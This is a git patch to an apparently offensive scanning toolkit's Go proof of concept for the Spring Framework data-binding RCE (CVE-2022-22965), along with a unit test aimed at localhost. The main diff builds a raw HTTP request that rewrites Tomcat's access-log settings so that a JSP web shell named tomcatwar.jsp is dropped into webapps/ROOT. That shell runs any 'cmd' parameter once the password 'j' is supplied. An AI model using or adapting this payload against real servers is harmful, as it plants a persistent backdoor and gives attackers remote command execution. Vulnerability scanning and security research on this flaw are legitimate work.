From a254deec81f12543f18d0183dafae67a3e5d7e0c Mon Sep 17 00:00:00 2001 From: hktalent <18223385+hktalent@users.noreply.github.com> Date: Thu, 13 Oct 2022 16:23:23 +0800 Subject: [PATCH] Spring Framework RCE via Data Binding on JDK 9+ (CVE-2022-22965) 2022-10-13 --- pocs_go/Springboot/CVE-2022-22965.go | 17 ++++++++++------- pocs_go/Springboot/CVE-2022-22965_test.go | 23 +++++++++++++++++++++++ 2 files changed, 33 insertions(+), 7 deletions(-) create mode 100644 pocs_go/Springboot/CVE-2022-22965_test.go diff --git a/pocs_go/Springboot/CVE-2022-22965.go b/pocs_go/Springboot/CVE-2022-22965.go index 6b7fe0d73..9a9be67eb 100644 --- a/pocs_go/Springboot/CVE-2022-22965.go +++ b/pocs_go/Springboot/CVE-2022-22965.go @@ -8,17 +8,20 @@ import ( ) func CVE_2022_22965(u string) bool { - if req, err := util.HttpRequset(u+"?class.module.classLoader%5b1%5d=1", "GET", "", false, nil); err == nil { - if req.StatusCode == 500 { - if req2, err := util.HttpRequset(u+"?class.module.classLoader=1", "GET", "", false, nil); err == nil { - if req2.StatusCode == 200 { - return true + if oU, err := url.Parse(u); nil == err && oU.Host != "" { + szUrl := oU.Scheme + "://" + oU.Host + if req, err := util.HttpRequset(szUrl+"?class.module.classLoader%5b1%5d=1", "GET", "", false, nil); err == nil { + if req.StatusCode == 500 { + if req2, err := util.HttpRequset(szUrl+"?class.module.classLoader=1", "GET", "", false, nil); err == nil { + if req2.StatusCode == 200 { + return true + } } } } - } - if oU, err := url.Parse(u); nil == err && oU.Host != "" { + cc := socket.NewCheckTarget(u, "tcp", 50) + defer cc.Close() cc.SendPayload([]byte(strings.ReplaceAll(`GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1 Host: `+oU.Host+` Accept-Encoding: gzip, deflate diff --git a/pocs_go/Springboot/CVE-2022-22965_test.go b/pocs_go/Springboot/CVE-2022-22965_test.go new file mode 100644 index 000000000..0d886695c --- /dev/null +++ b/pocs_go/Springboot/CVE-2022-22965_test.go @@ -0,0 +1,23 @@ +package Springboot + +import "testing" + +func TestCVE_2022_22965(t *testing.T) { + type args struct { + u string + } + tests := []struct { + name string + args args + want bool + }{ + {"test CVE_2022_22965", args{"http://127.0.0.1:8080"}, true}, + } + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + if got := CVE_2022_22965(tt.args.u); got != tt.want { + t.Errorf("CVE_2022_22965() = %v, want %v", got, tt.want) + } + }) + } +}